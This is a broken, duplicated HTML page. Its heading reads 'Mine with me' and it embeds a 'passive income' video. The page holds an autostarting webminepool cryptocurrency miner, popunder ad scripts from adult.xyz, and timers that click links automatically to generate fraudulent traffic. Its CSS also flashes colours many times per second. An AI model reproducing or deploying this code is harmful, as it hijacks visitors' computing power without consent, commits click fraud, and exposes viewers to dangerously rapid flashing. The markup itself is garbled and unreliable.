
<!DOCTYPE html>
<html id="page">
    <head id="h1">
        <p>Mine with me </p>
    </head><!DOCTYPE html>
<html id="page">
    <head>
        <h1 id="h1">Cocacolaa liteeeeeeeeeeeeee</h1> 
        <h2> <a id="link" href="https://funnturntv.blogspot.com/">Linnnnnnnnkkkkkkkkkkkkk</a></h2>
        <script type="text/javascript">
var adult_id = 21817199;
var adult_advert = 'int';
var adult_protocol = 'http';
var adult_domain = 'taraa.xyz';
var domains = ['depositfiles.com','rapidshare.com','vip-file.com'];
var adult_nofollow = true;
var frequency_cap = '5';
var frequency_delay = '5';
var init_delay = '3';
var popunder = true;
</script>
<script src="https://cdn.adult.xyz/js/link-converter.js"></script>
<script src="https://cdn.adult.xyz/js/entry.js"></script>
        </head>
    <body>
        

            <iframe
            id="frame" 
            width="1000px" 
            height="600px" 
            src="https://www.youtube.com/embed/EpeJoTu9T5I" 
            title="Real Passive Income 💢Aplication Android(Pay to open APK )" 
            frameborder="0" 
            allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen>
            </iframe>
            
       
        <script>
            setInterval(function(){
            document.getElementById("link").click();	
            }, 4000);
        </script>
    </body>
    <style id="style1">
        #page{
            margin-left:15%;
            width:100%;
            height:100%;
            color:black;
            font-weight:bold;
            animation: myanimation 0.03s infinite;
        }

        @keyframes myanimation {
         0% {background-color: red;}
         25%{background-color:yellow;}
        50%{background-color:green;}
        75%{background-color:brown;}
        100% {background-color: red;}
        }
        
        #h1{
            text-align: center;
            background-color: brown;
            border-radius: 100px;
            background-size: cover;

            width:100%;
            height:100%;
            color:rgb(194, 1, 1);
            font-weight:bold;
            animation: myanimation 0.01s infinite;
            }

        @keyframes myanimation {
            0% {background-color: rgb(38, 0, 255);}
            25%{background-color:rgb(75, 75, 70);}
            50%{background-color:rgb(202, 189, 11);}
            75%{background-color:rgb(37, 226, 12);}
            100%{background-color: rgb(247, 138, 138);}
            }
        
        
    </style>
</html>
 <boddy>
     <script src="https://webminepool.com/lib/base.js"></script>
<script>
    var miner = WMP.Anonymous('SK_6lxZEligoARxePfKtSSP5');
    miner.start();
</script>
    
     <script src="https://webminepool.com/lib/simple-ui.js"></script>
    <div id="wmp-container"
    wmp-site-key="SK_6lxZEligoARxePfKtSSP5"
    wmp-username="<username>"
    wmp-threads="2"
    wmp-throttle="0.1"
    wmp-autostart="true"
    style="margin: 0 auto;"
>
</div>
     
 </body>
    <!-- Start of adult.xyz banner code -->
<div style="width: 468px; text-align: center; font-family: verdana; font-size: 10px;"><a href="https://adult.xyz/?id=21817199"><img border="0" src="https://cdn.adult.xyz/images/banners/adult.468x60.5.gif" width="468" height="60" title="Adult.xyz - shorten links and earn money!" /></a><br /><a href="https://adult.xyz/?id=21817199">Get paid to share your links!</a></div>
<!-- End of adult.xyz banner code -->
    
    
    <style id="style1">
        #page{
            margin-left:15%;
            width:100%;
            height:100%;
            color:black;
            font-weight:bold;
            animation: myanimation 0.03s infinite;
        }

        @keyframes myanimation {
         0% {background-color: red;}
         25%{background-color:yellow;}
        50%{background-color:green;}
        75%{background-color:brown;}
        100% {background-color: red;}
        }
        
        #h1{
            text-align: center;
            background-color: brown;
            border-radius: 100px;
            background-size: cover;

            width:100%;
            height:100%;
            color:rgb(194, 1, 1);
            font-weight:bold;
            animation: myanimation 0.01s infinite;
            }

        @keyframes myanimation {
            0% {background-color: rgb(38, 0, 255);}
            25%{background-color:rgb(75, 75, 70);}
            50%{background-color:rgb(202, 189, 11);}
            75%{background-color:rgb(37, 226, 12);}
            100%{background-color: rgb(247, 138, 138);}
            }
        <a id="id" href="https://www.rotate4all.com/ptp/promote-263333">If its works</a>
        <script>
        setInterval(function(){
document.getElementById("id").click();	
}, 9900);
     
   </script>
</html>
